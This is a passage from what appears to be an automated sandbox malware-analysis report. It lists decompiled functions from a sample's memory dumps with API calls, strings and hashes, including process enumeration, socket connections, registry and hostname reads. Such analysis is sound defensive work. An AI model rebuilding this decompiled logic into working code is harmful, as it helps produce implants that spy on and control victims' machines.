						if( *(_t88 + 0x18) < 8) {
							_t60 = _t88 + 4;
						} else {
							_t60 =  *((intOrPtr*)(_t88 + 4));
						}
						_t79 = _t76 + _t76;
						_t84 = _t92 + _t92 + 2;
						E00425DFA(_t71, _t76 + _t76, _t71, _t92 + _t92 + 2, _t60, _t79);
						_t76 = _a12;
						_t99 = _t99 + 0x10;
					}
					_t108 =  *(_t88 + 0x18) - 8;
					if( *(_t88 + 0x18) >= 8) {
						_push( *((intOrPtr*)(_t88 + 4)));
						E0040A3F2(_t71, _t84, _t88, _t92, _t108);
						_t76 = _a12;
					}
					_t57 = _t88 + 4;
					 *_t57 = 0;
					 *_t57 = _t71;
					 *(_t88 + 0x18) = _t92;
					 *(_t88 + 0x14) = _t76;
					if(_t92 >= 8) {
						_t57 = _t71;
					}
					 *((short*)(_t57 + _t76 * 2)) = 0;
					 *[fs:0x0] = _v16;
					return _t57;
				}
			}

APIs

std::exception::exception.LIBCMT ref: 004045EF
__CxxThrowException@8.LIBCMT ref: 00404604
_memcpy_s.LIBCMT ref: 00404656

Strings

|%D, xrefs: 004045FD

Memory Dump Source

Source File: 00000001.00000002.463687697.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.463677405.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463814440.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463852955.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.463866171.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463880501.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463893307.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463962268.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: Exception@8Throw_memcpy_sstd::exception::exception
String ID: |%D
API String ID: 464988439-1005067592
Opcode ID: 140bd7e58693ceb65a9f4214a136ad864e3a481a191c7941318ceacb378116bc
Instruction ID: 280a102d8a42f444420ea416332aab166492caea0ea6a6dbe51039a3dc83a96b
Opcode Fuzzy Hash: 140bd7e58693ceb65a9f4214a136ad864e3a481a191c7941318ceacb378116bc
Instruction Fuzzy Hash: 1C41B1B1A00605ABCB04CF59C98099EB7B4FB49314F10863FE526A7780E779AA14CBD5

Uniqueness

Uniqueness Score: -1.00%

Function 0040EADE, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E0040EADE(void* __edi, intOrPtr _a4, intOrPtr* _a8) {
				void _v20;
				int _t14;
				int _t18;
				intOrPtr* _t23;
				void* _t25;

				if(E0040E932() == 0) {
					if(_a4 != 0x12340042) {
						L9:
						_t14 = 0;
						L10:
						return _t14;
					}
					_t23 = _a8;
					if(_t23 == 0 ||  *_t23 < 0x28 || SystemParametersInfoA(0x30, 0,  &_v20, 0) == 0) {
						goto L9;
					} else {
						 *((intOrPtr*)(_t23 + 4)) = 0;
						 *((intOrPtr*)(_t23 + 8)) = 0;
						 *((intOrPtr*)(_t23 + 0xc)) = GetSystemMetrics(0);
						_t18 = GetSystemMetrics(1);
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						 *(_t23 + 0x10) = _t18;
						 *((intOrPtr*)(_t23 + 0x24)) = 1;
						if( *_t23 >= 0x48) {
							E00429273(_t25, _t23 + 0x28, 0x20, "DISPLAY", 0x1f);
						}
						_t14 = 1;
						goto L10;
					}
				}
				return  *0x4524d8(_a4, _a8);
			}

APIs

SystemParametersInfoA.USER32(00000030,00000000,00000000,00000000), ref: 0040EB1C
GetSystemMetrics.USER32 ref: 0040EB34
GetSystemMetrics.USER32 ref: 0040EB3B

Strings

DISPLAY, xrefs: 0040EB58

Memory Dump Source

Source File: 00000001.00000002.463687697.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.463677405.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463814440.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463852955.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.463866171.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463880501.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463893307.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463962268.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: System$Metrics$InfoParameters
String ID: DISPLAY
API String ID: 3136151823-865373369
Opcode ID: bafc51d8d70406bb2a410c72ca7409d9f45882c2e2d67789fbf29fbd24cf31fe
Instruction ID: 1749a497c6d48bc896e633c6973daa4b12970a5ec15f7fa29fbadcc6c66833b7
Opcode Fuzzy Hash: bafc51d8d70406bb2a410c72ca7409d9f45882c2e2d67789fbf29fbd24cf31fe
Instruction Fuzzy Hash: 32119871E00324EBCB11DF65AC8196B7BB8EF05740F004877FD06BA185D678E851CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 10005A97, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 43
sleepCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E10005A97(void* __ecx, void* __eflags, void* __fp0) {
				signed int _t37;
				signed int _t38;
				void* _t40;
				void* _t42;
				intOrPtr* _t43;
				void* _t45;

				_t45 = __eflags;
				E100158AC(E1001A22C, _t40);
				_t43 = _t42 - 0x70;
				_push(_t37);
				_push(__ecx);
				 *((intOrPtr*)(_t40 - 0x10)) = _t43;
				L10015818();
				E1000490A();
				 *_t43 = 0x3e8;
				Sleep("chrome.exe");
				E10001603(_t40 - 0x7c, _t45);
				 *(_t40 - 4) =  *(_t40 - 4) & 0x00000000;
				if(E10001736(_t40 - 0x7c, _t45, 0x10027010,  *0x10023a0c) != 0) {
					E1000143E(_t40 - 0x24, __eflags, __fp0, _t40 - 0x7c);
					 *(_t40 - 4) = 1;
					E10001912(_t40 - 0x7c);
					 *(_t40 - 4) =  *(_t40 - 4) & 0x00000000;
					E100015D9(_t40 - 0x24);
					_t38 = 0;
					__eflags = 0;
				} else {
					_t38 = _t37 | 0xffffffff;
				}
				 *(_t40 - 4) =  *(_t40 - 4) | 0xffffffff;
				E100016A7(_t40 - 0x7c);
				 *[fs:0x0] =  *((intOrPtr*)(_t40 - 0xc));
				return _t38;
			}

0x10005a97
0x10005a9c
0x10005aa1
0x10005aa4
0x10005aa5
0x10005aa8
0x10005ab0
0x10005ab5
0x10005aba
0x10005ac1
0x10005aca
0x10005ad5
0x10005ae8
0x10005af6
0x10005afe
0x10005b02
0x10005b07
0x10005b0e
0x10005b13
0x10005b13
0x10005aea
0x10005aea
0x10005aea
0x10005b15
0x10005b1c
0x10005b26
0x10005b2f

APIs

__EH_prolog.LIBCMT ref: 10005A9C
#537.MFC42(chrome.exe), ref: 10005AB0

Part of subcall function 1000490A: __EH_prolog.LIBCMT ref: 1000490F
Part of subcall function 1000490A: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 10004925
Part of subcall function 1000490A: Process32First.KERNEL32(00000000,?), ref: 1000493E
Part of subcall function 1000490A: #800.MFC42(00000000,00000000,00000128,00000000,?,00000002,00000000,?,00000000,75D6F420), ref: 10004A1F

Sleep.KERNEL32(chrome.exe), ref: 10005AC1

Part of subcall function 10001603: __EH_prolog.LIBCMT ref: 10001608
Part of subcall function 10001603: WSAStartup.WS2_32(00000202,?), ref: 1000165D
Part of subcall function 10001603: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 10001668
Part of subcall function 10001603: memcpy.MSVCRT ref: 1000168E

Part of subcall function 10001736: ResetEvent.KERNEL32(?,00001F91,?,00000000), ref: 10001749
Part of subcall function 10001736: socket.WS2_32(00000002,00000001,00000006), ref: 1000175A
Part of subcall function 10001736: gethostbyname.WS2_32(?), ref: 1000176B
Part of subcall function 10001736: htons.WS2_32(?), ref: 10001780
Part of subcall function 10001736: connect.WS2_32(?,00000002,00000010), ref: 1000179D

Strings

chrome.exe, xrefs: 10005AAB

Memory Dump Source

Source File: 00000001.00000002.465761791.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.465752166.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.465804093.000000001001B000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.465830628.0000000010023000.00000004.00000001.sdmp Download File

Similarity

API ID: H_prolog$CreateEvent$#537#800FirstProcess32ResetSleepSnapshotStartupToolhelp32connectgethostbynamehtonsmemcpysocket
String ID: chrome.exe
API String ID: 828917539-2619149582
Opcode ID: 61c8362a6311070472d0bc63975f8c3983b1c1cca75e831550abc0042cefa9bf
Instruction ID: fa018abb8b7d54becd9fa5f34895ecfde3ffce264a34b26ba270d9b6ef104523
Opcode Fuzzy Hash: 61c8362a6311070472d0bc63975f8c3983b1c1cca75e831550abc0042cefa9bf
Instruction Fuzzy Hash: 9201C035C10148DAEB24DBB4D852ADDB774EF15391F608259E471771C6CF366B08CB52

Uniqueness

Uniqueness Score: -1.00%

Function 00430409, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 41
COMMON

Download Yara Rule

C-Code - Quality: 27%

			E00430409(void* __ebx, void* __ecx, void* __edx, intOrPtr* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				void* __ebp;
				void* _t20;
				void* _t22;
				void* _t23;
				void* _t25;
				intOrPtr* _t26;
				void* _t27;
				void* _t28;

				_t27 = __esi;
				_t26 = __edi;
				_t25 = __edx;
				_t23 = __ecx;
				_t22 = __ebx;
				_t30 = _a20;
				if(_a20 != 0) {
					_push(_a20);
					_push(__ebx);
					_push(__esi);
					_push(_a4);
					E00430378(__ebx, __edi, __esi, _t30);
					_t28 = _t28 + 0x10;
				}
				_t31 = _a28;
				_push(_a4);
				if(_a28 != 0) {
					_push(_a28);
				} else {
					_push(_t27);
				}
				E00426E4A(_t23);
				_push( *_t26);
				_push(_a16);
				_push(_a12);
				_push(_t27);
				E0042FDFC(_t22, _t25, _t26, _t27, _t31);
				_push(0x100);
				_push(_a24);
				_push(_a16);
				 *((intOrPtr*)(_t27 + 8)) =  *((intOrPtr*)(_t26 + 4)) + 1;
				_push(_a8);
				_push(_t27);
				_push(_a4);
				_t20 = E0043005D(_t22,  *((intOrPtr*)(_t22 + 0xc)), _t26, _t27, _t31);
				if(_t20 != 0) {
					E00426E13(_t20, _t27);
					return _t20;
				}
				return _t20;
			}

APIs

___BuildCatchObject.LIBCMT ref: 0043041A

Part of subcall function 00430378: ___BuildCatchObjectHelper.LIBCMT ref: 004303AE
Part of subcall function 00430378: ___AdjustPointer.LIBCMT ref: 004303C5

_UnwindNestedFrames.LIBCMT ref: 00430431
___FrameUnwindToState.LIBCMT ref: 0043043F

Strings

csm, xrefs: 00430416, 0043042B, 0043043E, 0043045C, 0043046C

Memory Dump Source

Source File: 00000001.00000002.463687697.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.463677405.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463814440.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463852955.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.463866171.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463880501.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463893307.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463962268.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: BuildCatchObjectUnwind$AdjustFrameFramesHelperNestedPointerState
String ID: csm
API String ID: 11809540-1018135373
Opcode ID: 12b618ea4a70c52241f7466c20c28dec541d9009826b2c8d0cff5cc33c44e3b3
Instruction ID: 4fe56a9b1f0f482a496b4d253052508cc73fff5c5bec5154ca26ec676378ebb6
Opcode Fuzzy Hash: 12b618ea4a70c52241f7466c20c28dec541d9009826b2c8d0cff5cc33c44e3b3
Instruction Fuzzy Hash: 36014231100119BBCF126F52DC41EAB3F6AEF18358F40811AFE1815221D73A9AB1EBA8

Uniqueness

Uniqueness Score: -1.00%

Function 10008182, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 33
threadCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E10008182(intOrPtr __ecx) {
				void* _t11;
				signed int _t15;
				void** _t21;
				intOrPtr _t24;
				void* _t26;

				E100158AC(E1001A459, _t26);
				_push(__ecx);
				_t24 = __ecx;
				 *((intOrPtr*)(_t26 - 0x10)) = __ecx;
				 *((intOrPtr*)(__ecx)) = 0x1001b44c;
				_t15 = 0;
				 *(_t26 - 4) = 0;
				if( *((intOrPtr*)(__ecx + 0xfac)) > 0) {
					_t21 = __ecx + 0xc;
					do {
						TerminateThread( *_t21, 0xffffffff);
						CloseHandle( *_t21);
						_t15 = _t15 + 1;
						_t21 =  &(_t21[1]);
					} while (_t15 <  *((intOrPtr*)(_t24 + 0xfac)));
				}
				 *(_t26 - 4) =  *(_t26 - 4) | 0xffffffff;
				_t11 = E1000BEBA(_t24);
				 *[fs:0x0] =  *((intOrPtr*)(_t26 - 0xc));
				return _t11;
			}

0x10008187
0x1000818c
0x1000818f
0x10008191
0x10008194
0x1000819a
0x100081a2
0x100081a5
0x100081a8
0x100081ab
0x100081af
0x100081b7
0x100081bd
0x100081be
0x100081c1
0x100081c9
0x100081ca
0x100081d0
0x100081da
0x100081e2

APIs

__EH_prolog.LIBCMT ref: 10008187
TerminateThread.KERNEL32(?,000000FF,00000001,00000000,Vwxyabcd Fghijklmn Pqrstuv Xyabcdef Hij,?,1000BE4A,?), ref: 100081AF
CloseHandle.KERNEL32(?,?,1000BE4A,?), ref: 100081B7

Strings

Vwxyabcd Fghijklmn Pqrstuv Xyabcdef Hij, xrefs: 1000818D

Memory Dump Source

Source File: 00000001.00000002.465761791.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.465752166.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.465804093.000000001001B000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.465830628.0000000010023000.00000004.00000001.sdmp Download File

Similarity

API ID: CloseH_prologHandleTerminateThread
String ID: Vwxyabcd Fghijklmn Pqrstuv Xyabcdef Hij
API String ID: 977738144-3480391467
Opcode ID: 117afcf3914a7d278c98f9e3d4bc6bc9dc393be0b9c41042de8d1cef8d413bd8
Instruction ID: e3d1b75b629b5c0c3bcc7ab84b38263f7d5aa29e91178a2de41889e8dbd602c1
Opcode Fuzzy Hash: 117afcf3914a7d278c98f9e3d4bc6bc9dc393be0b9c41042de8d1cef8d413bd8
Instruction Fuzzy Hash: CBF0F075A00611DFDB20DF58C8805CEB7B5FF48330B20822EF0AAA2291CB702942CB40

Uniqueness

Uniqueness Score: -1.00%

Function 10008F48, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 28
stringnetworkCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E10008F48(char* _a4, int _a8, intOrPtr _a12) {
				int _t8;
				char* _t10;

				_t10 = _a4;
				memset(_t10, 0, _a8);
				E1000D28E(0x80000001, _a12, "Remark", 1, _t10, 0, _a8, 0);
				_t8 = lstrlenA(_t10);
				if(_t8 == 0) {
					return gethostname(_t10, _a8);
				}
				return _t8;
			}

0x10008f4c
0x10008f55
0x10008f72
0x10008f7b
0x10008f83
0x00000000
0x10008f89
0x10008f91

APIs

memset.MSVCRT ref: 10008F55

Part of subcall function 1000D28E: memset.MSVCRT ref: 1000D2C3
Part of subcall function 1000D28E: memset.MSVCRT ref: 1000D2D7
Part of subcall function 1000D28E: memset.MSVCRT ref: 1000D2E6
Part of subcall function 1000D28E: LoadLibraryA.KERNEL32(ADVAPI32.dll), ref: 1000D2F4
Part of subcall function 1000D28E: GetProcAddress.KERNEL32(00000000,RegQueryValueExA), ref: 1000D30C
Part of subcall function 1000D28E: GetProcAddress.KERNEL32(?,RegOpenKeyExA), ref: 1000D31C
Part of subcall function 1000D28E: GetProcAddress.KERNEL32(?,RegEnumValueA), ref: 1000D32C
Part of subcall function 1000D28E: GetProcAddress.KERNEL32(?,RegEnumKeyExA), ref: 1000D339
Part of subcall function 1000D28E: GetProcAddress.KERNEL32(?,RegCloseKey), ref: 1000D346
Part of subcall function 1000D28E: FreeLibrary.KERNEL32(?), ref: 1000D4D2

lstrlenA.KERNEL32(00000032,?,?,?,?,?,?,?,?,?,00000032,?), ref: 10008F7B
gethostname.WS2_32(00000032,?), ref: 10008F89

Strings

Remark, xrefs: 10008F65

Memory Dump Source

Source File: 00000001.00000002.465761791.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.465752166.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.465804093.000000001001B000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.465830628.0000000010023000.00000004.00000001.sdmp Download File

Similarity

API ID: AddressProc$memset$Library$FreeLoadgethostnamelstrlen
String ID: Remark
API String ID: 619171837-3865500943
Opcode ID: 567c658a28793d325fdf6c8e94455b25a09ebde3527e03e253343f3983702330
Instruction ID: 45ff74c7b71f29b0913b429bc29dc1abb7babec308df3e7e7d6fde43cec1cfa1
Opcode Fuzzy Hash: 567c658a28793d325fdf6c8e94455b25a09ebde3527e03e253343f3983702330
Instruction Fuzzy Hash: 17E0ED36141624BBEB125F919C45FCE3B69EF097A1F118000FB1865054DB72A2619BA5

Uniqueness

Uniqueness Score: -1.00%

Function 00433366, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 13
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 65%

			E00433366() {
				signed long long _v12;
				signed int _v20;
				signed long long _v28;
				signed char _t8;

				_t8 = GetModuleHandleA("KERNEL32");
				if(_t8 == 0) {
					L6:
					_v20 =  *0x440c40;
					_v28 =  *0x440c38;
					asm("fsubr qword [ebp-0x18]");
					_v12 = _v28 / _v20 * _v20;
					asm("fld1");
					asm("fcomp qword [ebp-0x8]");
					asm("fnstsw ax");
					if((_t8 & 0x00000005) != 0) {
						return 0;
					} else {
						return 1;
					}
				} else {
					__eax = GetProcAddress(__eax, "IsProcessorFeaturePresent");
					if(__eax == 0) {
						goto L6;
					} else {
						_push(0);
						return __eax;
					}
				}
			}

APIs

GetModuleHandleA.KERNEL32(KERNEL32,0042A43A), ref: 0043336B
GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 0043337B

Strings

IsProcessorFeaturePresent, xrefs: 00433375
KERNEL32, xrefs: 00433366

Memory Dump Source

Source File: 00000001.00000002.463687697.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.463677405.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463814440.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463852955.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.463866171.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463880501.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463893307.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463962268.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressHandleModuleProc
String ID: IsProcessorFeaturePresent$KERNEL32
API String ID: 1646373207-3105848591
Opcode ID: 1ff3b7368d621a2865122e4cead488d0c3c4ee1a71562b8811248afa1dc60543
Instruction ID: 319c169067377543713bffa939f6980dde61baca6c2278a05582f2168807bcb1
Opcode Fuzzy Hash: 1ff3b7368d621a2865122e4cead488d0c3c4ee1a71562b8811248afa1dc60543
Instruction Fuzzy Hash: 9FC08C60B80300A2EB541FB07C4AF1B22083B1CB03F14BA6ABC0AD40D4DE6DC224982D

Uniqueness

Uniqueness Score: -1.00%

Function 0041D9D2, Relevance: 6.3, APIs: 4, Instructions: 309
memoryCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E0041D9D2(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, void* __eflags, signed int _a4, signed int _a8, signed int _a12, signed int _a16, char _a20, signed int _a44, signed int _a48, signed int _a52, intOrPtr _a56, signed int _a60, intOrPtr _a64, char _a68, intOrPtr _a92, signed int _a96, signed int _a100, intOrPtr _a104, signed int _a108, intOrPtr _a112, signed int _a116, char _a120) {
				signed int _v4;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				intOrPtr _v36;
				void* _v40;
				char _v124;
				char _v168;
				char _v176;
				char _v184;
				signed int* __ebp;
				signed int _t131;
				signed int _t137;
				signed int _t138;
				void* _t139;
				intOrPtr* _t144;
				intOrPtr* _t147;
				signed int _t148;
				signed int _t150;
				intOrPtr* _t151;
				void* _t153;
				intOrPtr* _t157;
				signed int _t162;
				intOrPtr _t163;
				intOrPtr* _t165;
				intOrPtr* _t167;
				intOrPtr* _t175;
				intOrPtr _t177;
				signed int _t178;
				signed int _t180;
				signed int* _t181;
				void* _t182;
				intOrPtr* _t183;
				signed int _t197;
				signed int _t199;
				intOrPtr _t214;
				intOrPtr* _t216;
				intOrPtr _t217;
				signed int _t219;
				void* _t222;
				void* _t223;
				void* _t225;
				void* _t226;

				_t183 = __ecx;
				_t226 = _t225 - 0x74;
				_t219 =  &_v124;
				_t131 =  *0x44f5d0; // 0x8e7de579
				_a116 = _t131 ^ _t219;
				_push(0x1c);
				E004271DA(E0043AF42, __ebx, __edi, __esi);
				_t216 = __ecx;
				_v16 =  *((intOrPtr*)(__ecx + 0x14));
				_a4 =  *((intOrPtr*)(__ecx + 0x10));
				if( *((intOrPtr*)(__ecx + 0x48)) == 0) {
					_t137 =  *(__ecx + 8);
					__eflags = _t137;
					if(_t137 != 0) {
						_t209 =  &_a12;
						_t138 =  *((intOrPtr*)( *_t137 + 0xc))(_t137, 0x441da4,  &_a12,  &_a8);
						__eflags = _t138;
						if(_t138 >= 0) {
							E0041A3B7( &_a12,  &_a20, 0x4424c0);
							_a52 = _a52 | 0xffffffff;
							_a44 = 0;
							_a48 = 0;
							_a56 = 0x18;
							_a60 = 0;
							_a64 = 0x1fb;
							E0041A3B7( &_a12,  &_a68, 0x4424a8);
							_t144 = _a12;
							_a100 = _a100 | 0xffffffff;
							_t209 =  &_a20;
							_a92 = 0x1c;
							_a96 = 0;
							_a104 = 0x20;
							_a108 = 0;
							_a112 = 0x1e;
							_t178 =  *((intOrPtr*)( *_t144 + 0x10))(_t144, 2,  &_a20, 0x28, 0);
							__eflags = _t178;
							if(_t178 >= 0) {
								_t209 = 0;
								_v40 = _a8;
								_t147 = _a12;
								_v36 = 1;
								_v32 = 0;
								_v28 = 0;
								_v24 = 0;
								_t148 =  *((intOrPtr*)( *_t147 + 0x18))(_t147, 0, 0,  &_v40);
								__eflags = _t148;
								 *_t219 = _t148;
								if(_t148 >= 0) {
									 *((intOrPtr*)(_t216 + 0x14)) = _v32;
									_t150 = _v20;
									_a8 = _t150;
									 *(_t216 + 0x10) = _t150;
									_t151 = _a12;
									 *((intOrPtr*)(_t216 + 0x34)) = _v28;
									 *((intOrPtr*)( *_t151 + 8))(_t151);
									goto L31;
								} else {
									_t165 = _a12;
									 *((intOrPtr*)( *_t165 + 8))(_t165);
								}
								goto L49;
							} else {
								_t167 = _a12;
								 *((intOrPtr*)( *_t167 + 8))(_t167);
								_t138 = _t178;
							}
						}
					} else {
						_t138 = 0;
					}
					goto L50;
				} else {
					__eax =  *(__esi + 0x4c);
					__ecx =  *__eax;
					__edx =  &_a16;
					__eax =  *((intOrPtr*)(__ecx + 0x14))(__eax, 0x441fa4, __edx);
					__eflags = __eax;
					 *__ebp = __eax;
					if(__eax < 0) {
						L50:
						 *[fs:0x0] = _v12;
						_pop(_t214);
						_pop(_t217);
						_pop(_t177);
						_t139 = E0042569C(_t138, _t177, _a116 ^ _t219, _t209, _t214, _t217);
						__eflags =  &_a120;
						return _t139;
					} else {
						__eax = _a16;
						__ecx =  *__eax;
						__edx =  &_a8;
						_push( &_a8);
						_push(0x441f84);
						_push(__eax);
						__eflags = __eax;
						if(__eflags >= 0) {
							__eax = _a8;
							__edx =  &_a12;
							_push( &_a12);
							_push(0x4420c4);
							_a12 = 0;
							__ecx =  *__eax;
							_push(__eax);
							__eflags = __eax;
							if(__eflags >= 0) {
								__eax = _a12;
								__ecx =  *__eax;
								__edx = __esi + 0x58;
								__edx =  *(__esi + 4);
								__edx =  *(__esi + 4) + 0xe8;
								__eflags = __edx;
								__eax =  *((intOrPtr*)( *__eax + 0x14))(__eax, __edx, __esi + 0x58);
								__eax = _a12;
								__ecx =  *__eax;
								__eax =  *((intOrPtr*)( *__eax + 8))(__eax);
							}
							__eax = _a8;
							__ecx =  *__eax;
							__eax =  *((intOrPtr*)( *__eax + 8))(__eax);
						}
						__eax = E0040A3C7(__eflags, 0x14);
						__eflags = __eax - __edi;
						if(__eax == __edi) {
							__eax = 0;
							__eflags = 0;
						} else {
							__ecx = __eax;
							__eax = E0041D225(__eax, _a16);
						}
						 *(__esi + 0x50) = __eax;
						__eax = _a16;
						__ecx =  *__eax;
						__eax =  *((intOrPtr*)( *__eax + 8))(__eax);
						__eax =  *(__esi + 0x50);
						__ecx =  *__eax;
						__eflags =  *__eax - __edi;
						if(__eflags != 0) {
							__eflags = __eax;
							__eax = E0041A5E0(__ecx, __eax);
						}
						__eax = E0040A3C7(__eflags, 0x28);
						__eflags = __eax - __edi;
						if(__eax == __edi) {
							__eax = 0;
							__eflags = 0;
						} else {
							__ecx = __eax;
							__eax = E00419240(__eax, __edi, 0x1f40);
						}
						__edx =  *(__esi + 0x50);
						 *(__esi + 0x54) = __eax;
						_push( *( *(__esi + 0x50)));
						__ecx = __eax;
						__eax =  *(__esi + 0x54);
						__ecx =  *(__esi + 0x50);
						 *(__ecx + 8) =  *(__esi + 0x54);
						__eax =  *(__esi + 0x54);
						__eax =  *( *(__esi + 0x54) + 0xc);
						__eflags = __eax - 0x3333333;
						 *(__esi + 0x10) = __eax;
						if(__eax <= 0x3333333) {
							__eax = __eax * 0x28;
							__imp__CoTaskMemAlloc(__eax);
							__ecx = 0;
							__eflags = __eax - __edi;
							__ecx = 0 | __eflags != 0x00000000;
							 *(__esi + 0x14) = __eax;
							if(__eflags != 0) {
								 *(__esi + 0x10) =  *(__esi + 0x10) * 0x28;
								__eax = E004277B0(__edi, __eax, __edi,  *(__esi + 0x10) * 0x28);
								__ecx =  *(__esi + 0x50);
								__eax = E0041D247( *(__esi + 0x50));
								__ecx =  *(__esi + 0x50);
								__eax = E0041A59D(__ecx);
								L31:
								__eflags =  *(_t216 + 0x10);
								_a16 = 0;
								if( *(_t216 + 0x10) > 0) {
									_t182 = 0;
									__eflags = 0;
									do {
										_t162 = E0040A3C7(__eflags, 0x1c);
										_a8 = _t162;
										__eflags = _t162;
										_v4 = 0;
										if(_t162 == 0) {
											_t163 = 0;
											__eflags = 0;
										} else {
											_t163 = E004219E1(_t162, 0xa);
										}
										_v4 = _v4 | 0xffffffff;
										_a16 = _a16 + 1;
										 *((intOrPtr*)(_t182 +  *((intOrPtr*)(_t216 + 0x14)) + 0x24)) = _t163;
										_t182 = _t182 + 0x28;
										__eflags = _a16 -  *(_t216 + 0x10);
									} while (__eflags < 0);
								}
								_t180 = _v16;
								__eflags = _t180;
								if(_t180 != 0) {
									__eflags = _a4;
									if(_a4 > 0) {
										_t153 = 0xffffffdc;
										_t181 = _t180 + 0x24;
										_a16 = _a4;
										_a8 = _t153 - _v16;
										while(1) {
											_t197 =  *( *_t181 + 4);
											__eflags = _t197;
											_a4 = _t197;
											if(_t197 == 0) {
												goto L45;
											}
											while(1) {
												_t157 = E0040B523( &_a4);
												_t209 =  *_t216;
												 *((intOrPtr*)( *_t216 + 8))( *_t157, 1);
												__eflags = _a4;
												if(_a4 == 0) {
													goto L45;
												}
											}
											L45:
											E00421909( *_t181);
											_t199 =  *_t181;
											__eflags = _t199;
											if(_t199 != 0) {
												 *((intOrPtr*)( *_t199 + 4))(1);
											}
											_t181 =  &(_t181[0xa]);
											_t126 =  &_a16;
											 *_t126 = _a16 - 1;
											__eflags =  *_t126;
											if( *_t126 != 0) {
												continue;
											}
											goto L48;
										}
									}
									L48:
									__imp__CoTaskMemFree(_v16);
								}
								L49:
								_t138 =  *_t219;
								goto L50;
							} else {
								_push(_t219);
								_t222 = _t226;
								_push(_t183);
								_v168 = 0x44e8a0;
								E00429326( &_v168, 0x448908);
								asm("int3");
								_push(_t222);
								_t223 = _t226;
								_push(_t183);
								_v176 = 0x44e938;
								E00429326( &_v176, 0x44894c);
								asm("int3");
								_push(_t223);
								_push(_t183);
								_t12 =  &_v184; // 0x44e938
								_v184 = 0x44e9d0;
								E00429326(_t12, 0x448990);
								asm("int3");
								_t175 = _t183;
								 *((intOrPtr*)(_t175 + 4)) = 1;
								return _t175;
							}
						} else {
							__eax = 0x8007000e;
							goto L50;
						}
					}
				}
			}

0x0041d9d2
0x0041d9d3
0x0041d9d6
0x0041d9da
0x0041d9e1
0x0041d9e4
0x0041d9eb
0x0041d9f0
0x0041d9f5
0x0041da00
0x0041da03
0x0041db48
0x0041db4b
0x0041db4d
0x0041db5c
0x0041db66
0x0041db69
0x0041db6b
0x0041db7c
0x0041db81
0x0041db90
0x0041db93
0x0041db96
0x0041db9d
0x0041dba0
0x0041dba7
0x0041dbac
0x0041dbaf
0x0041dbb6
0x0041dbbc
0x0041dbc3
0x0041dbc6
0x0041dbcd
0x0041dbd0
0x0041dbdd
0x0041dbdf
0x0041dbe1
